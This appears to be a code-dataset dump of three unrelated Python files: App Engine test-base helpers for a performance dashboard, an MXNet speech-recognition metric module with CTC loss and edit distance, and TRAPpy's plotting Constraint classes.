    self.testbed.init_datastore_v3_stub()
    self.testbed.init_mail_stub()
    self.mail_stub = self.testbed.get_stub(testbed.MAIL_SERVICE_NAME)
    self.testbed.init_memcache_stub()
    # Clear ndb's in-context cache so entities don't leak between tests.
    ndb.get_context().clear_cache()
    self.testbed.init_taskqueue_stub(root_path=_QUEUE_YAML_DIR)
    self.testbed.init_user_stub()
    self.testbed.init_urlfetch_stub()
    self.mock_get_request = None
    self._PatchIsInternalUser()

  def tearDown(self):
    self.testbed.deactivate()

  def _AddFakeRietveldConfig(self):
    """Sets up fake service account credentials for tests."""
    rietveld_service.RietveldConfig(
        id='default_rietveld_config',
        client_email='foo@bar.com',
        service_account_key='Fake Account Key',
        server_url='https://test-rietveld.appspot.com',
        internal_server_url='https://test-rietveld.appspot.com').put()

  def ExecuteTaskQueueTasks(self, handler_name, task_queue_name):
    """Executes all of the tasks on the queue until there are none left.

    NOTE(review): relies on `self.testapp`, which is not created in setUp;
    subclasses are presumably expected to define it -- confirm with callers.
    """
    tasks = self.GetTaskQueueTasks(task_queue_name)
    task_queue = self.testbed.get_stub(testbed.TASKQUEUE_SERVICE_NAME)
    task_queue.FlushQueue(task_queue_name)
    for task in tasks:
      self.testapp.post(
          handler_name, urllib.unquote_plus(base64.b64decode(task['body'])))
    # Executing tasks may enqueue further tasks; recurse until the queue
    # stays empty.
    self.ExecuteTaskQueueTasks(handler_name, task_queue_name)

  def ExecuteDeferredTasks(self, task_queue_name):
    # Run each deferred payload, then recurse for any tasks those runs
    # enqueued; terminates once the queue drains.
    task_queue = self.testbed.get_stub(testbed.TASKQUEUE_SERVICE_NAME)
    tasks = task_queue.GetTasks(task_queue_name)
    task_queue.FlushQueue(task_queue_name)
    for task in tasks:
      deferred.run(base64.b64decode(task['body']))
      self.ExecuteDeferredTasks(task_queue_name)

  def GetTaskQueueTasks(self, task_queue_name):
    # Return the raw task dicts currently sitting on the named queue.
    task_queue = self.testbed.get_stub(testbed.TASKQUEUE_SERVICE_NAME)
    return task_queue.GetTasks(task_queue_name)

  def SetCurrentUser(self, email, user_id='123456', is_admin=False):
    """Sets the user in the environment in the current testbed."""
    self.testbed.setup_env(
        user_is_admin=('1' if is_admin else '0'),
        user_email=email,
        user_id=user_id,
        overwrite=True)

  def UnsetCurrentUser(self):
    """Sets the user in the environment to have no email and be non-admin."""
    self.testbed.setup_env(
        user_is_admin='0', user_email='', user_id='', overwrite=True)

  def GetEmbeddedVariable(self, response, var_name):
    """Gets a variable embedded in a script element in a response.

    If the variable was found but couldn't be parsed as JSON, this method
    has a side-effect of failing the test.

    Args:
      response: A webtest.TestResponse object.
      var_name: The name of the variable to fetch the value of.

    Returns:
      A value obtained from de-JSON-ifying the embedded variable,
      or None if no such value could be found in the response.
    """
    scripts_elements = response.html('script')
    for script_element in scripts_elements:
      contents = script_element.renderContents()
      # Assume that the variable is all one line, with no line breaks.
      match = re.search(var_name + r'\s*=\s*(.+);\s*$', contents,
                        re.MULTILINE)
      if match:
        javascript_value = match.group(1)
        try:
          return json.loads(javascript_value)
        except ValueError:
          self.fail('Could not deserialize value of "%s" as JSON:\n%s' %
                    (var_name, javascript_value))
        # self.fail raises, so this return is effectively unreachable; it
        # documents that a parse failure yields no value.
        return None
    return None

  def GetJsonValue(self, response, key):
    # Convenience accessor for one key of a JSON response body.
    return json.loads(response.body).get(key)

  def PatchDatastoreHooksRequest(self, remote_addr=None):
    """This patches the request object to allow IP address to be set.

    It should be used by tests which check code that does IP address checking
    through datastore_hooks.
    """
    get_request_patcher = mock.patch(
        'webapp2.get_request',
        mock.MagicMock(return_value=FakeRequestObject(remote_addr)))
    self.mock_get_request = get_request_patcher.start()
    self.addCleanup(get_request_patcher.stop)

  def _PatchIsInternalUser(self):
    """Sets up a fake version of utils.IsInternalUser to use in tests.

    This version doesn't try to make any requests to check whether the
    user is internal; it just checks for cached values and returns False
    if nothing is found.
    """
    def IsInternalUser():
      username = users.get_current_user()
      return bool(utils.GetCachedIsInternalUser(username))

    is_internal_user_patcher = mock.patch.object(
        utils, 'IsInternalUser', IsInternalUser)
    is_internal_user_patcher.start()
    self.addCleanup(is_internal_user_patcher.stop)
def AddTests(masters, bots, tests_dict):
  """Adds data to the mock datastore.

  Args:
    masters: List of buildbot master names.
    bots: List of bot names.
    tests_dict: Nested dictionary of tests to add; keys are test names
        and values are nested dictionaries of tests to add.
  """
  for master in masters:
    master_key = graph_data.Master(id=master).put()
    for bot in bots:
      graph_data.Bot(id=bot, parent=master_key).put()
      for test, subtests in tests_dict.items():
        path = '/'.join([master, bot, test])
        graph_data.TestMetadata(id=path).put()
        _AddSubtest(path, subtests)
def _AddSubtest(parent_test_path, subtests_dict):
  """Recursively adds sub-TestMetadata entities under a parent test.

  Args:
    parent_test_path: A path to the parent test.
    subtests_dict: A dict of test names to dictionaries of subtests.
  """
  for name, children in subtests_dict.items():
    child_path = '/'.join([parent_test_path, name])
    graph_data.TestMetadata(id=child_path).put()
    _AddSubtest(child_path, children)
def AddRows(test_path, rows):
  """Adds Rows to a given test.

  Args:
    test_path: Full test path of TestMetadata entity to add Rows to.
    rows: Either a dict mapping ID (revision) to properties, or a set of IDs.

  Returns:
    The list of Row entities which have been put, in order by ID.
  """
  container_key = utils.GetTestContainerKey(utils.TestKey(test_path))
  if isinstance(rows, dict):
    return _AddRowsFromDict(container_key, rows)
  return _AddRowsFromIterable(container_key, rows)
def _AddRowsFromDict(container_key, row_dict):
  """Adds a set of Rows given a dict of revisions to properties."""
  rows = [
      graph_data.Row(id=revision, parent=container_key, **row_dict[revision])
      for revision in sorted(row_dict)
  ]
  ndb.put_multi(rows)
  return rows
def _AddRowsFromIterable(container_key, row_ids):
  """Adds a set of Rows given an iterable of ID numbers."""
  rows = [
      graph_data.Row(id=row_id, parent=container_key, value=row_id)
      for row_id in sorted(row_ids)
  ]
  ndb.put_multi(rows)
  return rows
def SetIsInternalUser(user, is_internal_user):
  """Caches whether the given user should be treated as an internal user."""
  utils.SetCachedIsInternalUser(user, is_internal_user)
def SetSheriffDomains(domains):
  """Sets the stored list of sheriff domains."""
  stored_object.Set(utils.SHERIFF_DOMAINS_KEY, domains)
def SetIpWhitelist(ip_addresses):
  """Sets the stored list of whitelisted IP addresses."""
  stored_object.Set(utils.IP_WHITELIST_KEY, ip_addresses)
| |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import mxnet as mx
import numpy as np
from label_util import LabelUtil
from log_util import LogUtil
def check_label_shapes(labels, preds, shape=0):
    """Raise ValueError unless labels and preds are the same size.

    With ``shape == 0`` the lengths are compared; otherwise the ``.shape``
    attributes are compared.
    """
    if shape == 0:
        expected, actual = len(labels), len(preds)
    else:
        expected, actual = labels.shape, preds.shape
    if expected != actual:
        raise ValueError("Shape of labels {} does not match shape of "
                         "predictions {}".format(expected, actual))
class STTMetric(mx.metric.EvalMetric):
    """Character-error-rate (CER) metric for speech-to-text training.

    Accumulates the Levenshtein distance between best-path-decoded
    predictions and labels; optionally also accumulates CTC loss when
    ``is_epoch_end`` is set.
    """

    def __init__(self, batch_size, num_gpu, is_epoch_end=False, is_logging=True):
        super(STTMetric, self).__init__('STTMetric')
        self.batch_size = batch_size
        self.num_gpu = num_gpu
        # Running totals used by get_name_value() to derive the overall CER.
        self.total_n_label = 0
        self.total_l_dist = 0
        self.is_epoch_end = is_epoch_end
        self.total_ctc_loss = 0.
        self.batch_loss = 0.
        self.is_logging = is_logging

    def update(self, labels, preds):
        check_label_shapes(labels, preds)
        if self.is_logging:
            log = LogUtil().getlogger()
            labelUtil = LabelUtil.getInstance()
        self.batch_loss = 0.
        for label, pred in zip(labels, preds):
            label = label.asnumpy()
            pred = pred.asnumpy()
            # Each GPU processes batch_size/num_gpu utterances; pred rows
            # are time-major and interleaved across that per-GPU batch
            # (row = t * per_gpu_batch + i, as used below).
            # NOTE(review): '/' is true division on Python 3, making
            # seq_length a float; it is re-cast with int() everywhere it is
            # used, so this presumably predates Python 3 -- confirm.
            seq_length = len(pred) / int(int(self.batch_size) / int(self.num_gpu))
            for i in range(int(int(self.batch_size) / int(self.num_gpu))):
                # Ground-truth labels up to the first blank (0).
                l = remove_blank(label[i])
                # Greedy best-path decode: argmax per frame, then collapse
                # repeats/blanks with pred_best().
                p = []
                for k in range(int(seq_length)):
                    p.append(np.argmax(pred[k * int(int(self.batch_size) / int(self.num_gpu)) + i]))
                p = pred_best(p)
                l_distance = levenshtein_distance(l, p)
                self.total_n_label += len(l)
                self.total_l_dist += l_distance
                this_cer = float(l_distance) / float(len(l))
                if self.is_logging:
                    log.info("label: %s " % (labelUtil.convert_num_to_word(l)))
                    log.info("pred : %s , cer: %f (distance: %d/ label length: %d)" % (
                        labelUtil.convert_num_to_word(p), this_cer, l_distance, len(l)))
                self.num_inst += 1
                self.sum_metric += this_cer
                if self.is_epoch_end:
                    loss = ctc_loss(l, pred, i, int(seq_length), int(self.batch_size), int(self.num_gpu))
                    self.batch_loss += loss
                    if self.is_logging:
                        log.info("loss: %f " % loss)
        self.total_ctc_loss += self.batch_loss

    def get_batch_loss(self):
        # CTC loss accumulated during the most recent update() call.
        return self.batch_loss

    def get_name_value(self):
        # NOTE(review): unlike the EvalMetric convention of (name, value)
        # pairs, this returns (total_cer, total_n_label, total_l_dist,
        # total_ctc_loss) -- callers appear to rely on this shape.
        try:
            total_cer = float(self.total_l_dist) / float(self.total_n_label)
        except ZeroDivisionError:
            # No labels seen yet.
            total_cer = float('inf')
        return total_cer, self.total_n_label, self.total_l_dist, self.total_ctc_loss

    def reset(self):
        # Reset all running totals (including the base-class counters).
        self.total_n_label = 0
        self.total_l_dist = 0
        self.num_inst = 0
        self.sum_metric = 0.0
        self.total_ctc_loss = 0.0
def pred_best(p):
    """Collapse a raw CTC best-path sequence.

    Drops blanks (index 0) and merges consecutive repeats, returning the
    decoded label sequence.
    """
    collapsed = []
    previous = 0
    for current in p:
        if current != 0 and current != previous:
            collapsed.append(current)
        previous = current
    return collapsed
def remove_blank(l):
    """Return the labels of `l` up to (but excluding) the first blank (0)."""
    kept = []
    idx = 0
    # `l` is a numpy array (uses .size); stop at the first blank.
    while idx < l.size and l[idx] != 0:
        kept.append(l[idx])
        idx += 1
    return kept
def remove_space(l):
    """Return a copy of `l` with every space token filtered out."""
    label_util = LabelUtil.getInstance()
    return [token for token in l if token != label_util.get_space_index()]
def ctc_loss(label, prob, remainder, seq_length, batch_size, num_gpu=1, big_num=1e10):
    """Compute the CTC negative log-likelihood of `label` under `prob`.

    Runs the CTC forward (alpha) recursion in log space over the
    blank-augmented label sequence (blank index 0).  `prob` holds per-frame
    softmax outputs with rows interleaved across the per-GPU batch;
    `remainder` selects which utterance of that batch to score.

    NOTE(review): clamps `prob` in place, mutating the caller's array.
    """
    label_ = [0, 0]
    # Clamp probabilities away from zero so np.log is finite.
    prob[prob < 1 / big_num] = 1 / big_num
    log_prob = np.log(prob)
    l = len(label)
    # Interleave blanks: label_ becomes [0, 0, l1, 0, l2, 0, ..., ln, 0]
    # (index 0 is padding; positions are 1-based below).
    for i in range(l):
        label_.append(int(label[i]))
        label_.append(0)
    l_ = 2 * l + 1
    # a[t][j]: log alpha at time t for augmented-label position j,
    # initialized to (log of) effectively zero.
    a = np.full((seq_length, l_ + 1), -big_num)
    # Paths may start with the leading blank or the first label.
    a[0][1] = log_prob[remainder][0]
    a[0][2] = log_prob[remainder][label_[2]]
    for i in range(1, seq_length):
        # Frame i of this utterance within the interleaved batch layout.
        row = i * int(batch_size / num_gpu) + remainder
        a[i][1] = a[i - 1][1] + log_prob[row][0]
        a[i][2] = np.logaddexp(a[i - 1][2], a[i - 1][1]) + log_prob[row][label_[2]]
        for j in range(3, l_ + 1):
            # Stay or advance by one position...
            a[i][j] = np.logaddexp(a[i - 1][j], a[i - 1][j - 1])
            # ...and allow the skip transition between distinct non-blank
            # labels (standard CTC recursion).
            if label_[j] != 0 and label_[j] != label_[j - 2]:
                a[i][j] = np.logaddexp(a[i][j], a[i - 1][j - 2])
            a[i][j] += log_prob[row][label_[j]]
    # Valid paths end on the last label or the trailing blank.
    return -np.logaddexp(a[seq_length - 1][l_], a[seq_length - 1][l_ - 1])
# label is done with remove_blank
# pred is got from pred_best
def levenshtein_distance(label, pred):
    """Return the edit distance between two sequences.

    Uses the classic two-row dynamic-programming formulation; `label` is
    expected to come from remove_blank() and `pred` from pred_best().
    """
    if label == pred:
        return 0
    if not len(label):
        return len(pred)
    if not len(pred):
        return len(label)

    width = len(label) + 1
    prev_row = list(range(width))
    curr_row = [0] * width
    for i, p_ch in enumerate(pred):
        curr_row[0] = i + 1
        for j, l_ch in enumerate(label):
            substitution = prev_row[j] + (0 if l_ch == p_ch else 1)
            curr_row[j + 1] = min(curr_row[j] + 1, prev_row[j + 1] + 1,
                                  substitution)
        prev_row = curr_row[:]
    return curr_row[len(label)]
def char_match_1way(char_label, char_pred, criteria, n_whole_label):
    """Greedy one-directional character match score between two sequences.

    Walks the label left to right, consuming the earliest matching pred
    character whose remaining tail length stays within `criteria` of the
    label's remaining tail (keeping matches roughly position-aligned).
    The match count is normalized by `n_whole_label`.

    Returns (accuracy, n_matched).
    """
    n_label = len(char_label)
    n_pred = len(char_pred)
    pred_pos = 0  # next pred index eligible for matching
    accuracy = 0.
    next_accu = 0.
    n_matched = 0.
    next_n_matched = 0.
    for i_index in range(n_label):
        tail_label = n_label - 1 - i_index
        c_label = char_label[i_index]
        for j_index in range(pred_pos, n_pred):
            tail_pred = n_pred - 1 - j_index
            c_pred = char_pred[j_index]
            # Stop scanning once the remaining lengths diverge by more than
            # the criteria ratio in either direction.
            if tail_label < tail_pred * criteria or tail_pred < tail_label * criteria:
                break
            if c_label == c_pred:
                n_matched += 1.0
                pred_pos = j_index + 1
                break
    accuracy = n_matched / n_whole_label
    # Retry with the leading label character dropped, in case a leading
    # mismatch threw off the alignment; keep the higher-scoring result.
    # The 0.7 guard bounds the recursion depth.
    if n_label > 0.7 * n_whole_label:
        next_label = char_label[1:]
        next_accu, next_n_matched = char_match_1way(next_label, char_pred, criteria, n_whole_label)
        if next_accu > accuracy:
            accuracy = next_accu
            n_matched = next_n_matched
    return accuracy, n_matched
def char_match_2way(label, pred):
    """Score label/pred agreement scanning both forwards and backwards.

    Tries several alignment tolerances and both scan directions, keeping
    the best accuracy found.

    Returns (accuracy, n_matched, space-stripped label length).
    """
    n_whole_label = len(remove_space(label))
    reversed_label = label[::-1]
    reversed_pred = pred[::-1]
    best_fwd = (0., 0.)  # (accuracy, n_matched) scanning forwards
    best_bwd = (0., 0.)  # (accuracy, n_matched) scanning backwards
    for criteria in (0.98, 0.96, 0.93, 0.9, 0.85, 0.8, 0.7):
        fwd = char_match_1way(label, pred, criteria, n_whole_label)
        bwd = char_match_1way(reversed_label, reversed_pred, criteria,
                              n_whole_label)
        if fwd[0] > best_fwd[0]:
            best_fwd = fwd
        if bwd[0] > best_bwd[0]:
            best_bwd = bwd
    # Ties go to the backward scan, matching the original comparison.
    winner = best_fwd if best_fwd[0] > best_bwd[0] else best_bwd
    return winner[0], winner[1], n_whole_label
| |
# Copyright 2015-2016 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""This module provides the Constraint class for handling
filters and pivots in a modular fashion. This enable easy
constraint application.
An implementation of :mod:`trappy.plotter.AbstractDataPlotter`
is expected to use the :mod:`trappy.plotter.Constraint.ConstraintManager`
class to pivot and filter data and handle multiple column,
trace and event inputs.
The underlying object that encapsulates a unique set of
a data column, data event and the requisite filters is
:mod:`trappy.plotter.Constraint.Constraint`
"""
# pylint: disable=R0913
from trappy.plotter.Utils import decolonize, normalize_list
from trappy.utils import listify
from trappy.plotter import AttrConf
from trappy.utils import handle_duplicate_index
class Constraint(object):
    """
    What is a Constraint?
    It is collection of data based on two rules:

    - A Pivot
    - A Set of Filters
    - A Data Column

    For Example a :mod:`pandas.DataFrame`

    ===== ======== =========
    Time  CPU      Latency
    ===== ======== =========
    1     x        <val>
    2     y        <val>
    3     z        <val>
    4     a        <val>
    ===== ======== =========

    The resultant data will be split for each unique pivot value
    with the filters applied
    ::

        result["x"] = pd.Series.filtered()
        result["y"] = pd.Series.filtered()
        result["z"] = pd.Series.filtered()
        result["a"] = pd.Series.filtered()

    :param trappy_trace: Input Data
    :type trappy_trace: :mod:`pandas.DataFrame`, :mod:`trappy.trace.FTrace`

    :param pivot: The column around which the data will be pivoted
    :type pivot: str

    :param column: The data column
    :type column: str

    :param template: TRAPpy Event
    :type template: :mod:`trappy.base.Base` event

    :param trace_index: The index of the trace/data in the overall constraint
        data
    :type trace_index: int

    :param filters: A dictionary of filter values
    :type filters: dict
    """

    def __init__(self, trappy_trace, pivot, column, template, trace_index,
                 filters):
        self._trappy_trace = trappy_trace
        self._filters = filters
        self._pivot = pivot
        self.column = column
        self._template = template
        self._dup_resolved = False
        self._data = self.populate_data_frame()

        try:
            self.result = self._apply()
        except ValueError:
            if self._dup_resolved:
                # Duplicates were already resolved once, so retrying can't
                # help; propagate the original error.  (BUG FIX: this path
                # previously swallowed the exception, leaving self.result
                # unset.)
                raise
            self._handle_duplicate_index()
            try:
                self.result = self._apply()
            except Exception:
                # BUG FIX: was a bare `except:`, which also trapped
                # SystemExit/KeyboardInterrupt.
                raise ValueError("Unable to handle duplicates")

        self.trace_index = trace_index

    def _apply(self):
        """Apply the filters on the data column, split by pivot value.

        :returns: a dict mapping each pivot value to the filtered
            :mod:`pandas.Series` of ``self.column``; empty series are
            omitted.
        """
        data = self._data
        result = {}

        try:
            values = data[self.column]
        except KeyError:
            # Column absent from this data set: nothing to constrain.
            return result

        if self._pivot == AttrConf.PIVOT:
            pivot_vals = [AttrConf.PIVOT_VAL]
        else:
            pivot_vals = self.pivot_vals(data)

        for pivot_val in pivot_vals:
            criterion = values.map(lambda x: True)

            # AND together a membership test for every filtered column
            # present in the data; the pivot itself is handled below.
            for key in self._filters.keys():
                if key != self._pivot and key in data.columns:
                    criterion = criterion & data[key].map(
                        lambda x: x in self._filters[key])

            if pivot_val != AttrConf.PIVOT_VAL:
                criterion &= data[self._pivot] == pivot_val

            val_series = values[criterion]
            if len(val_series) != 0:
                result[pivot_val] = val_series

        return result

    def _handle_duplicate_index(self):
        """Handle duplicate values in index"""
        self._data = handle_duplicate_index(self._data)
        self._dup_resolved = True

    def _uses_trappy_trace(self):
        # A template implies the data came from a TRAPpy trace rather than
        # a raw DataFrame.
        if not self._template:
            return False
        else:
            return True

    def populate_data_frame(self):
        """Return the populated :mod:`pandas.DataFrame`"""
        if not self._uses_trappy_trace():
            return self._trappy_trace

        data_container = getattr(
            self._trappy_trace,
            decolonize(self._template.name))

        return data_container.data_frame

    def pivot_vals(self, data):
        """This method returns the unique pivot values for the
        Constraint's pivot and the column

        :param data: Input Data
        :type data: :mod:`pandas.DataFrame`
        """
        if self._pivot == AttrConf.PIVOT:
            return AttrConf.PIVOT_VAL

        if self._pivot not in data.columns:
            return []

        pivot_vals = set(data[self._pivot])
        if self._pivot in self._filters:
            # Restrict to the pivot values explicitly requested in filters.
            pivot_vals = pivot_vals & set(self._filters[self._pivot])

        return list(pivot_vals)

    def __str__(self):

        name = self.get_data_name()

        if not self._uses_trappy_trace():
            return name + ":" + self.column

        return name + ":" + \
            self._template.name + ":" + self.column

    def get_data_name(self):
        """Get name for the data member. This method
        relies on the "name" attribute for the name.
        If the name attribute is absent, it associates
        a numeric name to the respective data element

        :returns: The name of the data member
        """
        if self._uses_trappy_trace():
            if self._trappy_trace.name != "":
                return self._trappy_trace.name
            else:
                return "Trace {}".format(self.trace_index)
        else:
            return "DataFrame {}".format(self.trace_index)
class ConstraintManager(object):
    """A class responsible for converting inputs
    to constraints and also ensuring sanity

    :param traces: Input Trace data
    :type traces: :mod:`trappy.trace.FTrace`, list(:mod:`trappy.trace.FTrace`)

    :param columns: The column values from the corresponding
        :mod:`pandas.DataFrame`
    :type columns: str, list(str)

    :param pivot: The column around which the data will be
        pivoted:
    :type pivot: str

    :param filters: A dictionary of values to be applied on the
        respective columns
    :type filters: dict

    :param zip_constraints: Permutes the columns and traces instead
        of a one-to-one correspondence
    :type zip_constraints: bool
    """

    def __init__(self, traces, columns, templates, pivot, filters,
                 zip_constraints=True):

        # _ip_vec holds the three parallel input lists:
        # [0] traces, [1] columns, [2] templates.
        self._ip_vec = []
        self._ip_vec.append(listify(traces))
        self._ip_vec.append(listify(columns))
        self._ip_vec.append(listify(templates))

        # BUG FIX: this was `map(len, self._ip_vec)`.  On Python 3, map()
        # returns a single-use iterator: max() below exhausts it, and the
        # later min(self._lens) in _expand() then fails.  A list comprehension
        # behaves identically on Python 2 and works on Python 3.
        self._lens = [len(input_list) for input_list in self._ip_vec]
        self._max_len = max(self._lens)
        self._pivot = pivot
        self._filters = filters

        self._constraints = []

        self._trace_expanded = False
        self._expand()
        if zip_constraints:
            self._populate_zip_constraints()
        else:
            self._populate_constraints()

    def _expand(self):
        """This is really important. We need to
        meet the following criteria for constraint
        expansion:
        ::

            Len[traces] == Len[columns] == Len[templates]

        Or:
        ::

            Permute(
                Len[traces] = 1
                Len[columns] = 1
                Len[templates] != 1
            )

            Permute(
                Len[traces] = 1
                Len[columns] != 1
                Len[templates] != 1
            )
        """
        min_len = min(self._lens)
        # Indices of the inputs that are shorter than the longest one and
        # hence need to be replicated out to _max_len.
        max_pos_comp = [
            i for i,
            j in enumerate(
                self._lens) if j != self._max_len]

        if self._max_len == 1 and min_len != 1:
            raise RuntimeError("Essential Arg Missing")

        if self._max_len > 1:

            # Are they all equal?
            if len(set(self._lens)) == 1:
                return

            if min_len > 1:
                raise RuntimeError("Cannot Expand a list of Constraints")

            for val in max_pos_comp:
                if val == 0:
                    self._trace_expanded = True
                self._ip_vec[val] = normalize_list(self._max_len,
                                                   self._ip_vec[val])

    def _populate_constraints(self):
        """Populate the constraints creating one for each column in
        each trace

        In a multi-trace, multicolumn scenario, constraints are created for
        all the columns in each of the traces.  _populate_constraints()
        creates one constraint for the first trace and first column, the
        next for the second trace and second column,... This function
        creates a constraint for every combination of traces and columns
        possible.
        """

        for trace_idx, trace in enumerate(self._ip_vec[0]):
            for col in self._ip_vec[1]:
                template = self._ip_vec[2][trace_idx]
                constraint = Constraint(trace, self._pivot, col, template,
                                        trace_idx, self._filters)
                self._constraints.append(constraint)

    def get_column_index(self, constraint):
        """Return the position of the constraint's column in the input list."""
        return self._ip_vec[1].index(constraint.column)

    def _populate_zip_constraints(self):
        """Populate the expanded constraints

        In a multitrace, multicolumn scenario, create constraints for
        the first trace and the first column, second trace and second
        column,... that is, as if you run zip(traces, columns)
        """

        for idx in range(self._max_len):
            if self._trace_expanded:
                trace_idx = 0
            else:
                trace_idx = idx

            trace = self._ip_vec[0][idx]
            col = self._ip_vec[1][idx]
            template = self._ip_vec[2][idx]
            self._constraints.append(
                Constraint(trace, self._pivot, col, template, trace_idx,
                           self._filters))

    def generate_pivots(self, permute=False):
        """Return a union of the pivot values

        :param permute: Permute the Traces and Columns
        :type permute: bool
        """
        pivot_vals = []
        for constraint in self._constraints:
            pivot_vals += constraint.result.keys()

        p_list = list(set(pivot_vals))
        traces = range(self._lens[0])

        # Sort numerically when possible, then as hex strings, then lexically.
        try:
            sorted_plist = sorted(p_list, key=int)
        except (ValueError, TypeError):
            try:
                sorted_plist = sorted(p_list, key=lambda x: int(x, 16))
            except (ValueError, TypeError):
                sorted_plist = sorted(p_list)

        if permute:
            pivot_gen = ((trace_idx, pivot) for trace_idx in traces for pivot in sorted_plist)
            return pivot_gen, len(sorted_plist) * self._lens[0]
        else:
            return sorted_plist, len(sorted_plist)

    def constraint_labels(self):
        """
        :return: string to represent the
            set of Constraints
        """
        # List comprehension rather than map() so the result is a list on
        # both Python 2 and Python 3.
        return [str(constraint) for constraint in self._constraints]

    def __len__(self):
        return len(self._constraints)

    def __iter__(self):
        return iter(self._constraints)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.